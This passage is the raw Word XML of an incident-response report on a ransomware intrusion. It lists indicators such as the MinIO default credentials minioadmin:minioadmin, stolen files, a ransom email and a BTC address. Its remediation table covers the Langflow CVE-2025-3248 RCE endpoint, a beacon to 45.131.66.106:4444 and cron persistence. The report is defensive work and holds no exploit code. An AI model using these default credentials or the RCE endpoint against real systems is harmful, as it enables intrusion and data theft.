        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Abused default credentials</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="6160" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">minioadmin:minioadmin (MinIO)</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Stolen file</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="6160" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">credentials.json, terraform-state bucket</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Encrypted/destroyed tables</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="6160" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">config_info (1,342 rows), history (ff-db-01)</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Ransom artifact</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="6160" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">README_RANSOM table, ff-db-01</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Ransom contact</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="6160" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">e78393397@proton.me</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Ransom payment address</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="6160" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy (BTC)</w:t>
            </w:r>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="none"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="none"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="none"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="none"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="43600ADC">
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p w14:paraId="1FF071AA">
      <w:pPr>
        <w:pStyle w:val="706"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC6A2AC">
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="200"/>
        <w:ind/>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Specific fixes tied to each finding from the hunt, in the order the intrusion touched them. These close the exact gaps this incident exploited, not general hardening advice (that's in Recommendations).</w:t>
      </w:r>
      <w:r/>
      <w:r/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8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450"/>
        <w:gridCol w:w="3150"/>
        <w:gridCol w:w="3850"/>
        <w:gridCol w:w="900"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffffff" w:fill="1f3864"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="450" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="5BC5B73B">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">#</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffffff" w:fill="1f3864"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="3150" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="702A423A">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Finding</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffffff" w:fill="1f3864"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="3850" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="1597C06A">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Remediation</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffffff" w:fill="1f3864"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="14CE7A81">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Priority</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="450" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="5F3481E4">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="3150" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="4B938E8A">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Langflow vulnerable to CVE-2025-3248 (unauthenticated RCE via /api/v1/validate/code)</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="3850" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="47BCA77A">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Patch or upgrade Langflow past the vulnerable version. Until patched, block or authenticate the /api/v1/validate/code endpoint at the reverse proxy.</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="4E2CBA92">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffffff" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="450" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="1DA87681">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffffff" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="3150" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="4DB3CDB6">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">RCE payload beaconed out to 45.131.66.106:4444</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffffff" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="3850" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="260EF69B">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Block the IP and port at the perimeter firewall. Add egress filtering on ff-lf-01 so application-tier hosts can't reach arbitrary external addresses.</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffffff" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="33EAFC6D">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="450" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="030801C8">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">3</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="3150" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="6690C7F3">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Cron persistence installed under the langflow account (*/30 * * * *, beacons to the C2 host)</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="3850" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="7DEA423E">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Remove the malicious crontab entry from /var/spool/cron/crontabs/langflow. Confirm no other cron jobs were added under this or any other service account.</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="0E5A063F">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffffff" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="450" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="379656F0">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
